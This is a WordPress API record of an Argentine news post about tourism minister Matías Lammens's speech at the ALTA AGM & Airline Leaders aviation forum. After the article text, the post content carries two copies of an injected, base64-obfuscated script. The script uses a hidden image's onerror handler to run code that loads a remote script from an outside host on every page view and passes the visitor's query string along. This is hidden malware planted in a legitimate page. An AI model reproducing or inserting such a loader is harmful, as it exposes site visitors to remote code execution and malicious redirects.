{"id":1634,"date":"2022-10-18T09:50:10","date_gmt":"2022-10-18T12:50:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1634"},"modified":"2025-08-14T00:32:56","modified_gmt":"2025-08-14T03:32:56","slug":"lammens-vamos-a-seguir-trabajando-simultaneamente-en-la-promocion-y-desarrollo-del-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1634","title":{"rendered":"Lammens: \u201cVamos a seguir trabajando simult\u00e1neamente en la promoci\u00f3n y desarrollo del turismo\u201d"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong><em>Apertura del foro ALTA AGM &amp; Airline Leaders<\/em><\/strong><\/h2>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n,\u00a0<strong>Mat\u00edas Lammens<\/strong>, expuso durante la apertura del foro de\u00a0<strong><a href=\"http:\/\/altaairlineleaders.com\/\" target=\"_blank\" rel=\"noopener\">ALTA AGM &amp; Airline Leaders<\/a><\/strong>, donde repas\u00f3 las medidas llevadas adelante por el Estado Nacional para la recuperaci\u00f3n y crecimiento del sector tur\u00edstico pospandemia.<\/p>\n\n\n\n<p>\u201c<em>Vamos a seguir trabajando simult\u00e1neamente en la promoci\u00f3n y desarrollo del turismo. Ya llevamos adelante una inversi\u00f3n de USD 35 millones para obras y accedimos a un cr\u00e9dito del BID por USD 33 millones para potenciar el turismo de naturaleza en todo el pa\u00eds\u201d<\/em>, asegur\u00f3&nbsp;<strong>Lammens<\/strong>.<\/p>\n\n\n\n<p>El secretario de Transporte de la Naci\u00f3n, Diego Giuliano; el CEO de Asociaci\u00f3n Latinoamericana y del Caribe de Transporte A\u00e9reo (ALTA), Jos\u00e9 Ricardo Botelho; el CEO de Avianca Group, Adrian Neuhauser; y el secretario general de la Organizaci\u00f3n de Aviaci\u00f3n Civil Internacional (OACI), Juan Carlos Salazar, tambi\u00e9n expusieron en la apertura del foro.<\/p>\n\n\n\n<p>\u201c<em>Necesitamos un Estado inteligente: que estimule la demanda, como hicimos con PreViaje, y que cree las condiciones para que el sector privado siga invirtiendo<\/em>\u201d, agreg\u00f3 el ministro nacional. Y finaliz\u00f3: \u201c<em>Tenemos una expectativa enorme con el turismo, hay un acuerdo entre todos los sectores del pa\u00eds para llevar adelante un proyecto a mediano y largo plazo<\/em>\u201d.<\/p>\n\n\n\n<p><strong>ALTA AGM &amp; Airline Leaders<\/strong>, el principal evento de l\u00edderes de la aviaci\u00f3n comercial en Am\u00e9rica Latina y El Caribe,&nbsp;<strong>se llevar\u00e1 adelante hasta el 18 de octubre en Buenos Aires<\/strong>, con el objetivo de estimular un di\u00e1logo internacional que se traduzca en acciones tangibles para lograr una aviaci\u00f3n m\u00e1s segura, eficiente y sostenible.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Apertura del foro ALTA AGM &amp; Airline Leaders El ministro de Turismo y Deportes de la Naci\u00f3n,\u00a0Mat\u00edas Lammens, expuso durante la apertura del foro de\u00a0ALTA AGM &amp; Airline Leaders, donde repas\u00f3 las medidas llevadas adelante por el Estado Nacional para la recuperaci\u00f3n y crecimiento del sector tur\u00edstico pospandemia. \u201cVamos a seguir trabajando simult\u00e1neamente en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1635,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1634","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1634"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1634"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1634\/revisions"}],"predecessor-version":[{"id":7314,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1634\/revisions\/7314"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1635"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1634"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1634"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1634"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}